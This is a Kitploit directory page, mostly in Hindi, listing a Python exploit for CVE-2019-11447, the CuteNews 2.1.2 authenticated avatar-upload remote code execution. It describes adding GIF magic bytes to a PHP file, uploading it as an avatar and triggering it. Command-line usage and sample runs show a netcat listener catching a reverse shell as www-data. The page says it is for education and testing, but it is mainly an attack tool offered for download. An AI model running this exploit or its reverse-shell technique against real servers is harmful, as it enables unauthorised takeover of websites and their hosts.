Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-11447_CuteNews-AvatarUploadRCE — CVE-2019-11447 उर्फ CuteNews 2.1.2 Avatar upload RCE (प्रमाणित) के लिए एक्सप्लॉइट कोड | Kitploit
उपकरण/GitHubGitHub/coldfusionx/cve-2019-11447_cutenews-avataruploadrce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcoldfusionx/cve-2019-11447_cutenews-avataruploadrce

CVE-2019-11447_CuteNews-AvatarUploadRCE

CVE-2019-11447 उर्फ CuteNews 2.1.2 Avatar upload RCE (प्रमाणित) के लिए एक्सप्लॉइट कोड

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
35 साल पहलेअभी तक समीक्षित नहीं

CVE-2019-11447 एक्सप्लॉइट/PoC - CuteNews 2.1.2 अवतार अपलोड RCE (प्रमाणित)

CVE-2019-11447 के लिए एक्सप्लॉइट कोड, उर्फ CuteNews 2.1.2 अवतार अपलोड RCE (प्रमाणित)

एक्सप्लॉइट लिंक:

अपेक्षित परिणाम: एक खाते में लॉगिन/पंजीकरण करें, .gif मैजिक बाइट्स के साथ उपयोगकर्ता द्वारा चयनित PHP फ़ाइल तैयार करें, फ़ाइल को अवतार के रूप में अपलोड करें और रिमोट कोड एक्ज़िक्यूशन प्राप्त करने के लिए इसे ट्रिगर करें।

यह केवल शैक्षिक उद्देश्यों और कॉर्पोरेट वातावरण में परीक्षण के लिए है।

यह एक्सप्लॉइट Python 3.8.6 पर परीक्षण किया गया था।

उपयोग

root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]

CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX

optional arguments:
  -h, --help            show this help message and exit
  -l URL, --url URL     CuteNews URL (Example: http://127.0.0.1)
  -u USERNAME, --username USERNAME
                        Username to Login/Register
  -p PASSWORD, --password PASSWORD
                        Password to Login/Register
  -e EMAIL, --email EMAIL
                        Email to Login/Register

Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e [email protected]
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e [email protected]
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y

उपयोगकर्ता इनपुट:

यह एक्सप्लॉइट प्रारंभ में चलाने के लिए चार तर्कों की अपेक्षा करता है:

  • -l : CuteNews URL
  • -u : लॉगिन/पंजीकरण के लिए आवश्यक उपयोगकर्ता नाम
  • -p : लॉगिन/पंजीकरण के लिए आवश्यक पासवर्ड
  • -e : लॉगिन/पंजीकरण के लिए आवश्यक ईमेल

अतिरिक्त आवश्यक उपयोगकर्ता इनपुट:

  • Select your PHP file -> यहाँ उपयोगकर्ता को अपलोड की जाने वाली PHP फ़ाइल निर्दिष्ट करनी होती है, यह कोई भी PHP फ़ाइल हो सकती है, उदाहरण: PHP info, PHP रिवर्स शेल। यदि PHP फ़ाइल एक्सप्लॉइट के समान निर्देशिका में स्थित है, तो उपयोगकर्ता केवल फ़ाइल नाम निर्दिष्ट कर सकता है:

उदाहरण: [^] Select your PHP file -> rev.php

अन्यथा, उपयोगकर्ता को PHP फ़ाइल का स्थान निर्दिष्ट करना होगा:

उदाहरण: [^] Select your PHP file -> ~/Downloads/rev.php

  • Press y/n to trigger reverse shell -> यहाँ यदि उपयोगकर्ता ने PHP रिवर्स शेल अपलोड किया है, तो उसके पास y/n का उपयोग करके रिवर्स शेल ट्रिगर करने का विकल्प होता है।

किसी भी स्थिति में, एक्सप्लॉइट आगे उपयोग के लिए अपलोड की गई फ़ाइल का स्थान प्रिंट करने के लिए डिज़ाइन किया गया है।

एक्सप्लॉइट निष्पादन

  • परिदृश्य 1 > मौजूदा क्रेडेंशियल्स के साथ लॉगिन करना और रिवर्स शेल प्राप्त करना:
root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e [email protected]
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

शेल

root@kitploit:~
cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime    tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
  • परिदृश्य 2 > नया उपयोगकर्ता पंजीकृत करना और रिवर्स शेल प्राप्त करना:
root@kitploit:~
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e [email protected]
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

शेल

root@kitploit:~
cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime   tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2019-11447
टूल डाउनलोड करें